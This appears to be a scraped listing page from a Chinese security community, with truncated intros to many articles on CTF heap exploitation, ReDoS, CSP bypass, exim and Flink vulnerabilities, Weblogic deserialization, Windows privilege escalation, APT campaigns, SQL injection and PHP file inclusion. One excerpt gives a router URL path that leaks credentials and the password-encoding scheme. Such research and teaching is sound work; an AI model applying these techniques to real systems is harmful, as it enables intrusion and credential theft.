# 1\. pwn堆入门系列教程3 序言:这次终于过了off-by-one来到了Chunk Extend / Overlapping,这部分在上一节也进行了学习,所以难度相对来说不会是那么大,刚起初我以为,因为第一题很简单,但做到第二题,我发觉我连格式化字符串的漏洞都不会利用,真的是太菜了,后面看了看雪大佬的文章才会做 ## 1.1. HITCON Trainging lab13 这道题还是相对简单的,对于前面几道来说,上一道已经用过这种方法了,而且比这复杂许多,所以差不多了,不过还有些小细节注意下就好 ### 1.1.1. 功能分析 引用于ctf-wiki 1. 创建堆,根据用户输入的长度,申请对应内存空间,并利用 read ...
社区文章
# 正则表达式所引发的DoS攻击(Redos) ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 正则表达式(或正则表达式)基本上是搜索模式。例如,表达式`[cb]at`将匹配`cat`和`bat`。这篇文章不是介绍一个正则表达式的教程,如果你对正则表达式了解不多,可在阅读之前点击<https://medium.com/factory-mind/regex-tutorial-a-simple-cheatsheet-by-examples-649dc1c3f285>了解。 首先,让我们介绍一些重点知识。 ## 重复运算符 `+`是重复运算符,可代表某个字符或某个模式的重复。 ca+t 将会匹配...
社区文章
在我的定义里,爬虫在速度上一般有两种级别:在短时间内把你爬死的和鬼子进村悄悄滴慢慢爬你的。 前一种爬虫步子迈得太大,容易扯到蛋,被运维同学通过突发资源消耗或者简单频控就能识别出来。 后一种爬虫比较恶心,它爬取的速度很慢,隐藏在滚滚业务洪流中,隐蔽性极强,危害极高,识别难度也很高,就十分气人,我通常称呼它为慢速爬虫。 当然了,还有一些爬虫用了Headless的浏览器模拟人类请求,或者干脆就透过某些垃圾公司的客户端软件在屏幕(9999,9999)坐标处显示一个“不可见”的浏览器偷偷搞分布式“爬虫”。这种公司臭不要脸,迟早要倒闭,我们先鄙视它一下。 同志们,我每次要谈论的话题都很沉重,都涉及到程序员的相爱相杀(我觉得主要责任在于P...
社区文章
# 【技术分享】利用多语种JPEGs文件绕过内容安全策略(CSP) | ##### 译文声明 本文是翻译文章,文章来源:portswigger.net 原文地址:<http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html> 译文仅供参考,具体内容表达以及含义原文为准。 翻译:WisFree 预估稿费:140RMB(不服你也来投稿啊!) 投稿方式:发送邮件至[linwei#360.cn](mailto:linwei@360.cn),或登陆[网页版](http://bobao.360.cn/contribute/index)在线投稿 **前言*...
社区文章
**作者:[Hcamael@知道创宇404实验室](http://0x48.pw)** **英文版本:<https://paper.seebug.org/1028/>** 感恩节那天,meh在Bugzilla上提交了一个exim的uaf漏洞:<https://bugs.exim.org/show_bug.cgi?id=2199>,这周我对该漏洞进行应急复现,却发现,貌似利用meh提供的PoC并不能成功利用UAF漏洞造成crash #### 漏洞复现 首先进行漏洞复现 ##### 环境搭建 复现环境:ubuntu 16.04 server # 从github上拉取源码 $ git clone https://git...
社区文章
# WiReboot:让你的WiFi 7x24小时不掉线,还可以自动重启路由器 | ##### 译文声明 本文是翻译文章,文章来源:360安全播报 原文地址:<https://www.kickstarter.com/projects/786298545/wireboot-keep-your-wifi-on-24-7-automatically-rebo> 译文仅供参考,具体内容表达以及含义原文为准。 **WiReboot可以帮助人们更加方便快捷地连接无线网络,如果系统检测到无线网络连接中断,它可以自动重启调制解调器或者路由器,以恢复网络的正常通信。** ** ** **产品概述** “WiReboot”可以方便人们快速进行网络连...
社区文章
# Apache Flink CVE-2020-17518/17519 漏洞分析 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 本文从环境搭建入手,分析了Flink漏洞的调试和产生原因,针对两个漏洞的触发条件进行了细致的研究,总结漏洞的修补情况,特别是分析了Flink框架的web路由及REST API接口。 ## 0x01 介绍 ### 0x1 功能介绍 Apache Flink是一个面向数据流处理和批量数据处理的可分布式的开源计算框架。它可以用来做批处理,即处理静态的数据集、历史的数据集;也可以用来做流处理,即实时地处理一些实时数据流,实时地产生数据的结果;也可以用来做一些基于事件的应用。...
社区文章
原文地址:<https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d?gi=a2d8f321ad82> 与Windows平台相比,为macOS平台渗透测试介绍新型战术、技术和程序(TTP)的文章数要少得多。因此,本文将为读者详细介绍一种新型的方法:利用[Apfell](https://github.com/its-a-feature/Apfell "Apfell")框架中的JavaScript for Automation(JXA)代理实现对macOS的持久控制。 我们知道,macOS提供了一种名为Folder Actions的功...
社区文章
# CTF中32位程序调用64位代码的逆向方法 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 背景 在CTF中,逆向的玩法越来越多变,曾经出现过32位程序调用64位代码的情况,一般的静态分析和动态调试方法都会失效,让人十分头大,今天将通过2个案例来学习如何应对这种情况。 ## 案例 2个案例包括1个windows程序和1个linux ELF程序,正好覆盖了2个常见的平台,[下载地址](https://pan.baidu.com/s/11IcSdE-74xW68SlEE5glQg) (提取码:nxwx) 1. father and son (ELF),来源于2018年护网杯CTF ...
社区文章
# 【技术分享】攻击RDP——如何窃听不安全的RDP连接 | ##### 译文声明 本文是翻译文章,文章来源:exploit-db.com 原文地址:<https://www.exploit-db.com/docs/41621.pdf> 译文仅供参考,具体内容表达以及含义原文为准。 **** **** 翻译:[shan66](http://bobao.360.cn/member/contribute?uid=2522399780) 稿费:300RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 ** ** **简介** 系统管理员每天都会使用远程桌面协议(RDP)登录到远程Wind...
社区文章
# 详解AppLocker(Part 3) | ##### 译文声明 本文是翻译文章,文章原作者 tyranidslair,文章来源:tyranidslair.blogspot.com 原文地址:<https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-3.html> 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x00 前言 在上一篇[文章](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-2.html)中,我大概介绍了AL如何阻止进...
社区文章
**作者: 启明星辰ADLab 原文链接:<https://mp.weixin.qq.com/s/gqH0lqz1ey6IzT--UD9Jsg>** ## **01 研究背景** 沙箱作为很多主流应用的安全架构的重要组成部分,将进程限制在一个有限的环境内,避免该进程对磁盘等系统资源进行直接访问。Chromium 中的沙箱进程通过pipe等方式和具有I/O等高权限的进程交互来完成进一步的操作,因此利用IPC绕过沙箱成为一种常见的方式,而渲染进程和无沙箱的browser进程之间的通信也成为了被关注的重点。Chromium IPC 包括Legacy IPC和 Mojo,本文主要介绍Mojo IPC机制,同时对Mojo IPC经典案例进...
社区文章
# 月光再临——MoonLight组织针对中东地区的最新攻击活动剖析 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、概述 自2019年4月以来,奇安信APT实验室在日常威胁狩猎过程中监测到一批针对巴勒斯坦及加沙地区的有组织的、持续性的网络攻击行为,攻击面广、受害范围大,产生了严重的网络安全威胁,对此我们时刻保持高度关注并深入分析。 同时观察到近期部分安全厂商发布多篇定性为“拍拍熊”(APT-C-37)的最新活动报告,诸多报告内容与我们此次披露的“月光再临”行动存在高度重合。本着严谨、求实的研究态度,奇安信APT实验室对该批次攻击活动进行持续追踪跟进挖掘,最终研判结果指向了另一个在加沙地...
社区文章
# 【技术分享】Is Hajime botnet dead? | ##### 译文声明 本文是翻译文章,文章来源:netlab.360.com 原文地址:<http://blog.netlab.360.com/hajime-status-report/> 译文仅供参考,具体内容表达以及含义原文为准。 **概述** **** 我们于近期决定公开一部分Hajime相关的研究结果及数据,供社区成员查阅。本文的核心内容包含以下几点: [Hajime跟踪主页上线](http://data.netlab.360.com/hajime/)。结合Hajime的通讯特点(DHT+uTP),我们实现了对Hajime各Bot节点的长期跟踪,同时还在主页绘...
社区文章
# CVE-2017-10271 Weblogic XMLDecoder反序化分析 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x01前言 前段非常火的weblogic挖矿相信大家依旧记忆犹新,毕竟当时预警信息满天飞。今天我们就分析分析weblogic是因为什么原因导致任意命令执行,下载了恶意的挖矿脚本的。 ## 0x02漏洞描述 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的xml恶意数据,就可以拿到目标服务器的...
社区文章
**译者:知道创宇404实验室翻译组 原文链接:<https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html>** ## 前言 远程访问木马(RAT)的防御者不会立即辨别这是来自APT黑客的恶意软件。同样,网络服务(例如电子邮件、Microsoft Autodiscover、SMB、LDAP和SQL)的恶意攻击也是如此。在2020年,APT黑客组织Pawn Storm使用非复杂的攻击方法。 2020年,Pawn Storm黑客组织传播了Google云端硬盘和IMAP远程访问木马(RAT)进行...
社区文章
# 0x01 前言 拒绝服务漏洞,简称DOS,是一种旨在破坏正常的服务,使得服务中断或者暂停,导致用户无法访问或者使用服务 同时在智能合约中也可能存在拒绝服务漏洞,使得发生锁币,无法正常竞拍等等现象发生,从而带来恶劣的影响。 # 0x02 预备知识 本部分简略介绍应该掌握的知识点 * Send,Transfer * Call,Delegatecall,Callcode * 函数修饰关键词 * Require,Revert * 合约继承 * 数组和映射 * gas费率 # 0x03 已知漏洞类型 本部分将归纳出现的拒绝服务漏洞类型 1. 未设定gas费率的外部调用 2. 依赖外部的调用进展 3....
社区文章
# realworld CTF 20-21 easy_work ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x01 题目分析 ### 1.1 安全措施 ​ 解压fd.img文件得到vxwroks内核文件,通过分析可以发现,该内核文件为vxworks6.9,缺少符号表。 ​ 未开启任何保护措施。 ### 1.2 静态分析内核文件 ​ 发现特殊字符,经过初步判断此题应该是基于vxworks内核的私有协议分析题目,自定义该私有协议为PKT,通过与有符号表的vxworks6.9内核固件进行比对,发现该内核文件中缺失很多工具,导致无法直接获取shell接口。 ​ 进入可以发现加密操作: ​...
社区文章
# 【技术分享】深入解析FIN7黑客组织最新攻击技术 | ##### 译文声明 本文是翻译文章,文章来源:talosintelligence.com 原文地址:<http://blog.talosintelligence.com/2017/09/fin7-stealer.html> 译文仅供参考,具体内容表达以及含义原文为准。 **** 译者:[shan66](http://bobao.360.cn/member/contribute?uid=2522399780) 预估稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **摘要** 在这篇文章中,我们将详细介绍一个新近发现的RTF文件系列,F...
社区文章
# 赚了20亿美元GandCrab勒索病毒家族的故事 ##### 译文声明 本文是翻译文章,文章原作者 CyberThreatAnalyst,文章来源: CyberThreatAnalyst 原文地址:<https://mp.weixin.qq.com/s/DlPaBxIDN0G_xc4o_1SFKw> 译文仅供参考,具体内容表达以及含义原文为准。 2019年6月1日,GandCrab勒索病毒团队在相关论坛发表俄语官方声明,将停止更新,这款2018年最流行的勒索病毒,在2019年6月终于结束了……然后它的故事完了,钱赚够了,却打开了潘多拉魔盒,后面会有越来越多的GandCrab团队涌现出来……对这款勒索病毒,我跟踪了一年半,一年半之...
社区文章
# 【技术分享】使用Frida绕过Android SSL Re-Pinning ##### 译文声明 本文是翻译文章,文章来源:techblog.mediaservice.net 原文地址:<https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/> 译文仅供参考,具体内容表达以及含义原文为准。 **** 作者:for_while 预估稿费:40RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **Android SSL Re-Pinning** 在Android应用中可以找到两种...
社区文章
# CVE-2020-1181:SharePoint远程代码执行漏洞分析 | ##### 译文声明 本文是翻译文章,文章原作者 thezdi,文章来源:thezdi.com 原文地址:<https://www.thezdi.com/blog/2020/6/16/cve-2020-1181-sharepoint-remote-code-execution-through-web-parts> 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x00 前言 微软在上周发布了一个补丁,修复了[CVE-2020-1181](https://portal.msrc.microsoft.com/en-US/security-guidance...
社区文章
翻译自 <https://bugbountypoc.com/exploiting-cross-origin-resource-sharing/> (这个网站会公开获得赏金的漏洞的poc,方法,思路) 译者:聂心明 利用不安全的跨源资源共享(CORS)– BugBountyPOC 这个文章的公开者是BugBountyPOC.Note的贡献者[Muhammad Khizer Javed](https://web.facebook.com/MuhammadKhizerJaved33),这篇文章的作者是Muhammad Khizer Javed & 文章中所有的问题只能被他处理,我们允许匿名者作为guest/贡献者在我们的博客上...
社区文章
**作者:Zhiniang Peng from Qihoo 360 Core Security、Yuki Chen of Qihoo 360 Vulcan Team 博客:<http://blogs.360.cn/post/double-spending-attack.html>** 2008年,中本聪提出了一种完全通过点对点技术实现的电子现金系统(比特币)。该方案的核心价值在于其提出了基于工作量证明的解决方案,使现金系统在点对点环境下运行,并能够防止双花攻击。如今比特币已经诞生十年,无数种数字货币相应诞生,但人们对双花攻击的讨论似乎仍然停留在比特币51%攻击上。实际上,我们的研究发现,实用的数字货币双花攻击还有很多种其他形式。...
社区文章
# 深挖CVE-2018-10933(libssh服务端校验绕过)兼谈软件供应链真实威胁 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 作者:弗为,阿里安全-猎户座实验室 安全专家 ## 背景:事件 10月16日晚八点半,阿里安全-猎户座实验室漏洞预警捕获了oss网站一条不起眼的漏洞修复披露信息: > libssh 0.8.4 and 0.7.6 security and bugfix release > > This is an important security and maintenance release in order to address > CVE-2018-10933. > ...
社区文章
# 3月22日安全热点 – 60%财富500强公司受ManageEngine的漏洞影响 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ManageEngine 产品中出现代码执行漏洞 60%的财富500强公司受影响 <http://www.zdnet.com/article/manageengine-zero-day-vulnerabilities-impact-three-out-of-five-fortune-500s/> 固件更新发布修复影响多款 IP 摄像头的严重漏洞 <https://www.bleepingcomputer.com/news/security/firmware-upd...
社区文章
# 【技术分享】Android欺诈僵尸网络Chamois的检测和清除 | ##### 译文声明 本文是翻译文章,文章来源:googleblog.com 原文地址:<https://security.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html> 译文仅供参考,具体内容表达以及含义原文为准。 作者:[shan66](http://bobao.360.cn/member/contribute?uid=2522399780) 稿费:120RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **前言** 一直以来,Google...
社区文章
# 窃听风云: 你的MikroTik路由器正在被监听 ##### 译文声明 本文是翻译文章,文章来源:netlab.360.com 原文地址:<https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours/> 译文仅供参考,具体内容表达以及含义原文为准。 ## 背景介绍 MikroTik是一家拉脱维亚公司,成立于1996年,致力于开发路由器和无线ISP系统。MikroTik现在为世界上大多数国家/地区的互联网连接提供硬件和软件。在1997年,MikroTik创建了RouterO...
社区文章
# 一文回顾攻击Java RMI方式 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 前序 RMI存在着三个主体 * RMI Registry * RMI Client * RMI Server 而对于这三个主体其实都可以攻击,当然了需要根据jdk版本以及环境寻找对应的利用方式。 Ps.在最初接触的RMI洞是拿着工具一把梭,因此在以前看来笔者以为RMI是一个服务,暴露出端口后就可以随意攻击,现在看来是我才疏学浅了,对于RMI的理解过于片面了。本文是笔者在学习RMI的各种攻击方式后的小结,若有错误,请指出。 Ps1.本文并无任何新知识点,仅仅是对于各位师傅文章的一个小总结。 #...
社区文章
# 从西湖论剑2019Storm_note看largebin attack ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 这是西湖论剑预选赛pwn3题目,该题目需要用到largebin attack,该攻击方式比较少用,借此题目将相关知识总结一下。 ## 一、checksec Libc的版本是2.23,防护措施如下: ## 二、功能分析 程序在初始化的时候调用了mallopt。 该函数的功能如下: int mallopt(int param,int value) param的取值分别为M_MXFAST,value是以字节为单位。 M_MXFAST:定义使用fastbins的内存请求大小的上...
社区文章
# 2021 羊城杯 Babyvm Writeup | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 基本分析 ### 程序逻辑 * 虚拟机类题目 * 首先初始化 `engine` 实例。这里建立了一个 `engine_t` 结构体使得代码的可读性更高,并且可以根据语义推测出每个字段是什么 * 然后有个 SMC 自修改,但是这里并没有反调,所以直接步过跳过去。然后可以把修改后的代码 dump 下来,再 patch 回去即可。最后再把对 SMC 函数的调用 `nop` 掉即可 import idc start_addr = 0x80487A8 ...
社区文章
# Windows Defender 本地提权漏洞分析(CVE-2020-1170) ##### 译文声明 本文是翻译文章,文章原作者 github,文章来源:itm4n.github.io 原文地址:<https://itm4n.github.io/cve-2020-1170-windows-defender-eop/> 译文仅供参考,具体内容表达以及含义原文为准。 ## 简介 在深入了解此漏洞的技术细节之前,我想简单介绍一下时间线。大概8个月前,我最初通过ZDI报告了这个漏洞。向他们发送我的报告后,我收到了一个回复,他们对收购此漏洞不感兴趣。当时,我只有几个星期的Windows安全研究经验,所以我有点依赖他们的判断,把这个发现...
社区文章
**作者:晏子霜 原文链接:<http://www.whsgwl.net/blog/CVE-2018-8453_1.html>** ## 0x00: Windows10 1709 X64 无补丁 ## 0x01: EXPLOIT编写 非常感谢A-Team发表的漏洞分析以及 EXPLOIT 编写文章,阅览后受益匪浅,因此本文不再阐述漏洞细节,专注于EXPLOIT编写. 通过上文[(CVE-2018-8453从BSOD到Exploit(上))](http://www.whsgwl.net/blog/CVE-2018-8453_0.html)得知,触发异常是因为调用`win32kfull!xxxEndScroll`函数释放了由`win...
社区文章
# 起因 听大师傅说天翼安全网关可以telnet登录,回去尝试了下发现并没有开放telnet端口,把目标转向如何开启,经过一系列搜索,最后拿下网关 # 信息泄露 我家这个网关型号是 HG261GS,经过一番搜索,发现访问 `http://192.168.1.1/cgi-bin/baseinfoSet.cgi`可以拿到密码 然后搜索密码的加密方式,得到工程账号的密码,加密算法为 **加密算法:字母转换为其ASCII码+4,数字直接就是ASCII码** 之后登录 # 命令执行 在后台转了一圈没发现开启telnet的地方,经过一番搜索,找到这个版本存在命令执行的问题,访问`http://192.168.1.1/cgi-bin/telnet...
社区文章
## 0x01、什么是文件包含? 为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件。 ## 0x02、漏洞成因 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 ## 0x03、php引发文件包含漏洞的四个函数 include() include_once() require() require_once() include()和require()的区别: require()如果在包含过程中出错,就会直接退出,不执行后续语...
社区文章
# 【木马分析】一款国产Linux DDoS僵尸网络家族Jenki分析 | ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **** **** 作者: **[botnet-放牛娃](http://bobao.360.cn/member/contribute?uid=751101027)** 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 ** ** **1\. 介绍** 2017-07-26 22:53:52, **安天- Botmon团队,通过安天蜜网系统监控到某botnet样本,经过分析确认发现新型Linux DDoS木马。** 该木马目前国内几乎所...
社区文章
# 前言 这篇文章在写的时候我查阅了许多资料也参考了很多师傅的博客,尽我所能的搞懂这个知识点以及要完成这个操作所需要的相关知识。在搞明白以后,回过头来看,其实也没有当初那样晦涩难懂,只是初学起来会因为知识储备不够而走入思维的误区。 网上也有很多的相关资料,但我还是想把这篇文章分享出来,并不是因为我总结的有多好,见解有多深刻,而是每个人在遇到这个问题的时候思维不一样,知识储备不一样,走入的误区也不一样。自己做记录的同时,也希望帮助其他的伙伴。 ## 题目代码 <?php ini_set("display_errors", "On"); error_reporting(E_ALL | E_STRICT); ...
社区文章
# 前言 某商城cms1.7版本中中存在两个前台注入漏洞。话不多说,直接进入分析。 # SQL注入① ## 分析 我们直接定位到漏洞存在点 module/index/cart.php :12-32 行处。 case 'pintuan': $product_id = intval($_g_id); $product_guid = intval($_g_guid); $product_num = intval($_g_num); if (!user_checkguest()) pe_jsonshow(array('result'=>f...
社区文章
# 【知识】11月7日 - 每日安全知识热点 | ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **热点概要:数字签名恶意软件的崛起、 ** **WWE名人的Whatsapp屏幕截图和图片等信息泄露**** 、GIBON勒索软件出现、绕过安卓网络安全配置、CVE-2017-8715分析、 **探索影响Android的6个内核漏洞、 2017 Q3 DDoS**。** **资讯类:** 数字签名恶意软件的崛起 <https://thehackernews.com/2017/11/malware-digital-certificate.html> WWE名人的Whatsapp屏幕截...
社区文章
# 【技术分享】蝴蝶效应与程序错误---一个渣洞的利用 ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **** **1.介绍** 一只南美洲亚马孙河流域热带雨林中的蝴蝶,偶尔扇动几下翅膀,可能在美国德克萨斯引起一场龙卷风吗?这我不能确定,我能确定的是程序中的任意一个细微错误经过放大后都可能对程序产生灾难性的后果。在11月韩国首尔举行的PwnFest比赛中,我们利用了V8的一个逻辑错误(CVE-2016-9651)来实现Chrome的远程任意代码执行,这个逻辑错误非常微小,可以说是一个品相比较差的渣洞,但通过组合一些奇技淫巧,我们最终实现了对这个漏洞的稳定利用。这个漏洞给我的启...
社区文章
**作者:Y4tacker 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org** ## 前言 这其实是我很早前遇到的一个秋招面试题,问题大概是如果你遇到一个较高版本的FastJson有什么办法能绕过AutoType么?我一开始回答的是找黑名单外的类,后面面试官说想考察的是FastJson在原生反序列化当中的利用。因为比较有趣加上最近在网上也看到类似的东西,今天也就顺便在肝毕设之余来谈谈这个问题。 ## 利用与限制 Fastjson1版本小于等于1.2.48 Fastjson2目前通杀(目前最新版本2.0.26) ## 寻找 既然是与原生反序列化相关,那我们...
社区文章
# 关于ImageTragick漏洞的一些错误概念说明 | ##### 译文声明 本文是翻译文章,文章来源:360安全播报 原文地址:<https://lcamtuf.blogspot.tw/2016/05/clearing-up-some-misconceptions-around.html> 译文仅供参考,具体内容表达以及含义原文为准。 近期,据媒体报道,ImageTragick软件中存在着漏洞,影响了用户的正常使用。同时,此报道也引起了大量网页开发人员的关注。他们正尝试通过解决一个远程代码执行变量的方式,来修复这一漏洞。 ImageTragick是一款广受欢迎的图片制作操作软件。它可以用来读、写和处理超过89种基本格式的图片文...
社区文章
什么是PIE呢? PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题 下面通过一个例子来具体看一下PIE的效果 程序源码 #include <stdio.h> int main() { printf("%s","hello world!"); return 0; } 编译命令 gcc...
社区文章
作者:Fortune_C00kie 作者博客:<https://hacksec.xyz/2018/03/23/php-trick/> 随着代码安全的普及,越来越多的开发人员知道了如何防御sqli、xss等与语言无关的漏洞,但是对于和开发语言本身相关的一些漏洞和缺陷却知之甚少,于是这些点也就是我们在Code audit的时候的重点关注点。本文旨在总结一些在PHP代码中经常造成问题的点,也是我们在审计的时候的关注重点。(PS:本文也只是简单的列出问题,至于造成问题的底层原因未做详细解释,有兴趣的看官可以自行GOOGLE或者看看底层C代码。知其然,且知其所以然) 本文若有写错的地方,还请各位大佬斧正 :) TODO: 继续丰富并增加各...
社区文章
# 智能合约安全系列文章反汇编·上篇 ### 前言 通过上一篇反编译文章的学习,我们对智能合于opcode的反编译有了基础的学习,对于初学者来说,要想熟练运用还得多加练习。本篇我们来一块学习智能合约反汇编,同样使用的是Online Solidity Decompiler在线网站,智能合约反汇编对于初学者来说,较难理解,但对于智能合约代码来说,只要能读懂智能合约反汇编,就可以非常清晰的了解到合约的代码逻辑,对审计合约和CTF智能合约都有非常大的帮助 ### 反汇编内容 由于solidity智能合约的opcode经过反汇编后,指令较多,我们本篇分析简明要义,以一段简单合约代码来分析其反汇编后的指令内容 合约源码如下: pragm...
社区文章
# 0x00 NTLM认证攻击简介 本篇主要介绍 **NTLM** 认证相关的攻击技巧。首先得说明一下NTLM协议是windows两大认证协议之一,在了解其攻击方法之前学习它的认证协议流程是非常有必要的!因此在文章开头会大致带大家把 **认证基础** 走一遍。再了解完认证协议之后,需要去了解一下 **LLMNR、NetBIOS协议** 。因为这两种协议是攻击的前提,有了它两才有了这种攻击技巧! 此外 **SMB协议** 与 **NET-NTLM v1\v2** 也是我们需要去了解的,只有把这些弄懂后,你才能对相关 **原理** 大体弄懂!当然了,如果你是 **脚本小子** 不想去懂原理,那么在一些不顺利的场景下,你就完全就 **失去...
社区文章
> 一、网站<http://www.gsxt.gov.cn滑动验证码概述> > 二、极验验证码破解-抓包分析 > 三、极验验证码破解-搭建本地验证码服务 > 四、极验验证码破解-分析geetest.js,得到所需参数 > 五、极验验证码破解-Track的获取 > 六、极验验证码破解-获取背景图片及缺口距离d的计算 > 七、极验验证码破解-总结 > 参考文献 > 运行截图 ## 2017.8.21 代码以上传,可供参考 ## <https://github.com/FanhuaandLuomu/geetest_break> ## 五、极验验证码破解-Track的获取 1. Track...
社区文章